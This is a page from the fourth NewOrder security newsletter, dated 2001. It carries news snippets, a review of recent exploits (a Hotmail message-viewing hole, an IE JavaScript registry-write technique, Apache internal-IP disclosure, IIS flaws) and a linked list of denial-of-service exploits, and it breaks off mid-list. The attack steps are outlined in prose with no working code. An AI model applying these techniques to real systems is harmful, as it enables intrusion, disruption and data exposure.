|
features post Articles
(Articles)
online chat server:
irc.xor.cx
channel:
#neworderrandom article
quotable quotes "Man is born free;
and everywhere he is in chains.
One thinks himself the master of others,
and still remains a greater slave than they." Jean Jacques Rousseau
|
Neworder Newsletter #4
@ New Order Newsletter
Sep 03 2001, 18:00 (UTC+0) | N E w O r D e R / n E w S l E t T e R #4
[ i n t r o ]
Welcome to the fourth NewOrder newsletter, lots have happened this month/2-3 weeks since the last letter, Linux is 10, Microsoft hacked again, Novell users panicing over their vendors rush to get them patched and the Skylarov case worsens...
On a happier note, Neworders board has expanded to 40,000+ members since it was recoded, a succesful interview with the World Of Hell group was published [http://neworder.box.sk/newsread.php?newsid=4] and the first 3 issues of the newsletter have gone brilliantly. Thanx everyone...
the boxnetwork team
[ c o n t e n t s ]
0x01 news snippets
0x02 exploits in review
0x03 the vulnerability list
0x04 interesting articles
0x05 board notices
0x06 and finally...
[ n e w s s n i p p e t s ]
Rather than dump out lines and lines of news from the many news sites about the
place which isnt much use to anyone, you can get up to date and informative news
from many sites across the net. A couple of good ones are theregister.co.uk,
zdnet.com and infosyssec.com. Of course, there is newOrder, with news being update
more than daily by the users of interest to the community. Two stories which are
of particular interest though are included with relavant links below...
Russian computer programmer Dmitry Sklyarov could face 25 years in a United
States jail after a grand jury upped the stakes, adding conspiracy to his
copyright circumvention charges. Sklyarov was arrested earlier this summer at a
hotel in Las Vegas for designing a computer program that can circumvent e-book
security features. [http://www.newsbytes.com/news/01/169504.html]
Exploiting a hole in Windows 2000, a hacker says he penetrated Microsoft's
corporate network earlier this month and had full access to hundreds of the
company's computers. Benign claims to have virtually strolled into the systems'
back door, using Windows 2000's TCP port 445, which is open by default to allow
file sharing with remote systems. [http://www.newsbytes.com/news/01/169408.html]
[ e x p l o i t s i n r e v i e w ]
The world of exploits has had two major killers already this month. One we dont
know much about the other we know lots about but isnt totally useable so to
speak. Firstly, novell have discovered a massive hole in their GroupWise PadLock
system. This vulerability which we dont know much about bar the fix URL can
supposedly compromise an entire system/network. Its also assumed (from the tone of
reports and statement issued) that the vulnerabilty is remotely exploitable
(*1). *there has now been detail released
Aside from the big and mysterious hole in Novell's systems, for once in a blue
moon, Hotmail is hackable. Well, in a way. Details were released on the 19th of
this month on a message viewing hole. Dont get your hopes up too much however,
its not as easy as clicking any old URL. It basically follows the following
syntax:
1.You log into hotmail in your own account
2.You send a crafted URL with message details through the browser
3.Bingo, top secret (and most likely load of spam) messages are viewable
I say dont get your hopes up because actually successfully exploiting this is
not a trival task. You have to get the message ID right first for the persons
inbox to view the message. This is basically a timestamp on the message as it
arrives in the hotmail server for placing in your inbox. Its exactly this
process that makes making use of this exploit difficult. The timestamp takes
into account seconds, not just minutes. From discussions on Bugtraq, its looking
like a needle in a haystack scenario to actually view messages in someones
account. And to add further hinderences, its been patched :) (*2)
A more interesting and useful exploit released on Bugtraq this month is to do
with Javascript. The vulnerability relates to writing data to the registry from
Internet Explorer. The author relates it to being tested on windows 98 only at
the minute and the IE version was 5.5. In essence, the code to make this happen
has the following structure:
1. Write to the page an ActiveX applet
2. call a setCLSID (you'll notice these values
in the registry if you run regedit)
3. call a create instance on the ActiveX object then get the object and
place it in another variable
4. using a try method, attempt a RegWrite call, which presumably works
5. This is repeated again in the code, as a proof
If you want more details, I would advise going to www.securityfocus.com and
searching the Bugtraq archives for 'JavaScript Registry Windows98'. The sample
code writes to the search list and EnableDNS keys by the way if your interested
or accidently view it. Obviously, this sort of vulnerability is very dangerous,
imagine the consequences of viewing a malicous website running this trick...
Looking into the less sensational world of average exploits released lately,
there are a couple of interesting ones. Two IIS ones released so far, one
dealing with a buffer overflow attack and another more generic one based on
privallage escalation via exploitable scripts and programs. Staying with
Microsoft, the Outlook vulnerabilty that allowed message box data to be grabbed
via the ActiveX View control has now been patched (*3) and they have also
released a 'cumlutive' patch for IIS servers. This patch basically fixes all
that was wrong previously as well as a couple of new holes that were discovered
(*4).
The apache attack mentioned in previous articles that allowed the internal
network address to be viewed in some cases has had some exploit code released
for it to make peoples job's even more easy (*5). The code basically sends an
URL minus the '/' at the end. This produces an error code (redirection [3xx]
based) which tells the client that you need to do a bit more to get to the site
in question. When it does this, it also sends out a 'Location response header',
which contains the network address of the server. Obviously, if a firewall is in
place and the server is behind it, the internal IP of the server will be
disclosed, allowing for further network enumeration.
*1 http://neworder.box.sk/search.php3?srch=groupwise
*2 http://neworder.box.sk/showme.php3?id=5524
*3 http://neworder.box.sk/showme.php3?id=5517
*4 http://neworder.box.sk/showme.php3?id=5522
*5 http://neworder.box.sk/showme.php3?id=5520
[ t h e p i c k ]
.denial of service exploits
TomCat 3.2.1 - crashing one of the JSP pages with an exception can dump out
useful information for an attacker on the default error page
[http://neworder.box.sk/showme.php3?id=5525]
glFTPd 1.23 - based on a bug in the LIST command. exploit code is available as
UNIX based perl [http://neworder.box.sk/showme.php3?id=5515]
SHOUTcast 1.8.2 - Sample C code for use, uses exceptionally long data in a field
passed via HTTP to crash it [http://neworder.box.sk/showme.php3?id=5560]
ARP Table in Windows Networks - C code for unix included, see issue 3 for
details of this attack [http://neworder.box.sk/showme.php3?id=5561]
pcAnywhere 9.2|10 !9.2.1 - sending random and lots of characters immediatly on
connection [http://neworder.box.sk/showme.php3?id=5511]
.info leakage and file viewing
BadBlue File Viewing |
| Top of page
|
